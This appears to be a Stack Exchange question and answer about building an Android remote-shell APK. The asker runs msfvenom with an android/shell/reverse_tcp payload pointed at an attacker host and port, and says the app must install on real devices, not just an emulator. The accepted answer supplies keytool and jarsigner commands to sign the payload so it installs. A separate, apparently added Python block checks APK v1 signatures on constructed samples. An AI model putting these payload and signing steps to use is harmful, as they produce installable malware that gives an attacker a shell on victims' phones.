This is for educational purposes only!

I'm trying to generate an Android payload using the msfconsole standalone payload generator, msfvenom, with the command:

msfvenom -p android/shell/reverse_tcp LHOST=192.168.100.4 LPORT=4444 R > android_shell.apk

My problem is that the APK refuses to install on any Android version (I tried 4.0 to 4.3), and it shows the message:

application not installed

What am I doing wrong? Is there some kind of signing for the apk file?

alecxe
Eibo
  • Have you tried tools/exploit/install_msf_apk.sh script? – void_in Nov 01 '15 at 11:21
  • Can you provide a small explanation of this script, please? – Eibo Nov 01 '15 at 11:29
  • The payload generated by msfvenom is self-signed, which means you need to check the "Unknown sources" option. Also, the script only installs the package to an emulator so you can use it for testing. – void_in Nov 01 '15 at 12:35
  • This is not an option; I need some solution to make the APK work on various Android versions and not just an emulator. – Eibo Nov 01 '15 at 14:11

1 Answer

I've found my answer: referring to Signing Your Applications on the Android developer site, the APK needed to be signed.
However, I had to do it manually on Kali using the commands:

  • For generating the keystore:
    keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
  • For signing the app:
    jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore my_application.apk alias_name
Eibo
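For anyone triaging an APK, this added example (not part of the original answer) checks for the v1 (JAR) signature layout that jarsigner writes and confirms that every entry matches its manifest digest, using constructed in-memory archives. The function names and sample contents are assumptions; it checks structure and digests only and does not validate the signature block, which `jarsigner -verify` or `apksigner verify` does.

```python
import base64, hashlib, io, re, zipfile

MANIFEST = "META-INF/MANIFEST.MF"
SIG_META = re.compile(r"^META-INF/([^/]+\.(SF|RSA|DSA|EC)|MANIFEST\.MF)$", re.I)
DIGESTS = {"SHA1-Digest": "sha1", "SHA-256-Digest": "sha256"}

def parse_manifest(text):
    """Map entry name -> attributes for each per-entry section of MANIFEST.MF."""
    text = text.replace("\r\n", "\n").replace("\n ", "")  # unfold continuation lines
    entries = {}
    for section in text.split("\n\n"):
        attrs = dict(l.split(": ", 1) for l in section.split("\n") if ": " in l)
        if "Name" in attrs:
            entries[attrs.pop("Name")] = attrs
    return entries

def check_v1_signature(apk_bytes):
    """Return a list of problems; an empty list means the v1 layout is consistent."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        names = z.namelist()
        if MANIFEST not in names:
            return ["unsigned: no META-INF/MANIFEST.MF"]
        problems = [f"unsigned: no META-INF/*.{label}"
                    for label, pat in (("SF", r"SF"), ("RSA/DSA/EC", r"(RSA|DSA|EC)"))
                    if not any(re.match(rf"META-INF/[^/]+\.{pat}$", n, re.I) for n in names)]
        manifest = parse_manifest(z.read(MANIFEST).decode("utf-8"))
        for name in names:
            if SIG_META.match(name) or name.endswith("/"):
                continue  # signature files and directories carry no manifest digest
            known = [(k, v) for k, v in manifest.get(name, {}).items() if k in DIGESTS]
            if not known:
                problems.append(f"no digest in manifest: {name}")
            for key, value in known:
                actual = base64.b64encode(hashlib.new(DIGESTS[key], z.read(name)).digest()).decode()
                if actual != value:
                    problems.append(f"digest mismatch ({key}): {name}")
    return problems

def build_sample(signed, tamper=False):
    """Constructed stand-in for an APK: one entry plus optional v1 signature files."""
    dex, buf = b"constructed sample bytes", io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("classes.dex", dex + (b"!" if tamper else b""))
        if signed:
            d = base64.b64encode(hashlib.sha1(dex).digest()).decode()
            z.writestr(MANIFEST, f"Manifest-Version: 1.0\r\n\r\nName: classes.dex\r\nSHA1-Digest: {d}\r\n\r\n")
            z.writestr("META-INF/ALIAS_NA.SF", "Signature-Version: 1.0\r\n\r\n")
            z.writestr("META-INF/ALIAS_NA.RSA", b"placeholder, not a real PKCS#7 block")
    return buf.getvalue()
```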